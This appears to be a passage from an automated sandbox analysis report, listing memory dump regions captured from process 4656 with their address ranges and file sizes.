                                                                                • memory/4656-60-0x00007FFDB31C0000-0x00007FFDB3333000-memory.dmp
                                                                                  Filesize

                                                                                  1.4MB

                                                                                • memory/4656-58-0x00007FFDC2B90000-0x00007FFDC2BB3000-memory.dmp
                                                                                  Filesize

                                                                                  140KB

                                                                                • memory/4656-56-0x00007FFDC6A20000-0x00007FFDC6A39000-memory.dmp
                                                                                  Filesize

                                                                                  100KB

                                                                                • memory/4656-54-0x00007FFDC2D10000-0x00007FFDC2D3D000-memory.dmp
                                                                                  Filesize

                                                                                  180KB

                                                                                • memory/4656-31-0x00007FFDC66C0000-0x00007FFDC66E4000-memory.dmp
                                                                                  Filesize

                                                                                  144KB

                                                                                • memory/4656-25-0x00007FFDB3400000-0x00007FFDB39E8000-memory.dmp
                                                                                  Filesize

                                                                                  5.9MB

                                                                                • memory/4656-287-0x00007FFDC2B90000-0x00007FFDC2BB3000-memory.dmp
                                                                                  Filesize

                                                                                  140KB

                                                                                • memory/4656-323-0x00007FFDB2880000-0x00007FFDB299C000-memory.dmp
                                                                                  Filesize

                                                                                  1.1MB

                                                                                • memory/4656-324-0x00007FFDB31C0000-0x00007FFDB3333000-memory.dmp
                                                                                  Filesize

                                                                                  1.4MB

                                                                                • memory/4656-320-0x00007FFDB2330000-0x00007FFDB26A5000-memory.dmp
                                                                                  Filesize

                                                                                  3.5MB

                                                                                • memory/4656-319-0x00007FFDB26B0000-0x00007FFDB2768000-memory.dmp
                                                                                  Filesize

                                                                                  736KB

                                                                                • memory/4656-318-0x00007FFDC2AB0000-0x00007FFDC2ADE000-memory.dmp
                                                                                  Filesize

                                                                                  184KB

                                                                                • memory/4656-309-0x00007FFDB3400000-0x00007FFDB39E8000-memory.dmp
                                                                                  Filesize

                                                                                  5.9MB

                                                                                • memory/4656-316-0x00007FFDC2CF0000-0x00007FFDC2D09000-memory.dmp
                                                                                  Filesize

                                                                                  100KB

                                                                                • memory/4656-310-0x00007FFDC66C0000-0x00007FFDC66E4000-memory.dmp
                                                                                  Filesize

                                                                                  144KB

                                                                                • memory/4656-325-0x00007FFDB3400000-0x00007FFDB39E8000-memory.dmp
                                                                                  Filesize

                                                                                  5.9MB

                                                                                • memory/4656-349-0x00007FFDB26B0000-0x00007FFDB2768000-memory.dmp
                                                                                  Filesize

                                                                                  736KB

                                                                                • memory/4656-353-0x00007FFDC2FB0000-0x00007FFDC2FBD000-memory.dmp
                                                                                  Filesize

                                                                                  52KB

                                                                                • memory/4656-352-0x00007FFDC2DC0000-0x00007FFDC2DD4000-memory.dmp
                                                                                  Filesize

                                                                                  80KB

                                                                                • memory/4656-351-0x00007FFDB2330000-0x00007FFDB26A5000-memory.dmp
                                                                                  Filesize

                                                                                  3.5MB

                                                                                • memory/4656-350-0x00007FFDC2AB0000-0x00007FFDC2ADE000-memory.dmp
                                                                                  Filesize

                                                                                  184KB

                                                                                • memory/4656-348-0x00007FFDC3040000-0x00007FFDC304D000-memory.dmp
                                                                                  Filesize

                                                                                  52KB

                                                                                • memory/4656-347-0x00007FFDC2CF0000-0x00007FFDC2D09000-memory.dmp
                                                                                  Filesize

                                                                                  100KB

                                                                                • memory/4656-346-0x00007FFDB31C0000-0x00007FFDB3333000-memory.dmp
                                                                                  Filesize

                                                                                  1.4MB

                                                                                • memory/4656-345-0x00007FFDC2B90000-0x00007FFDC2BB3000-memory.dmp
                                                                                  Filesize

                                                                                  140KB

                                                                                • memory/4656-344-0x00007FFDC6A20000-0x00007FFDC6A39000-memory.dmp
                                                                                  Filesize

                                                                                  100KB

                                                                                • memory/4656-343-0x00007FFDC2D10000-0x00007FFDC2D3D000-memory.dmp
                                                                                  Filesize

                                                                                  180KB

                                                                                • memory/4656-342-0x00007FFDC7700000-0x00007FFDC770F000-memory.dmp
                                                                                  Filesize

                                                                                  60KB

                                                                                • memory/4656-341-0x00007FFDC66C0000-0x00007FFDC66E4000-memory.dmp
                                                                                  Filesize

                                                                                  144KB

                                                                                • memory/4656-340-0x00007FFDB2880000-0x00007FFDB299C000-memory.dmp
                                                                                  Filesize

                                                                                  1.1MB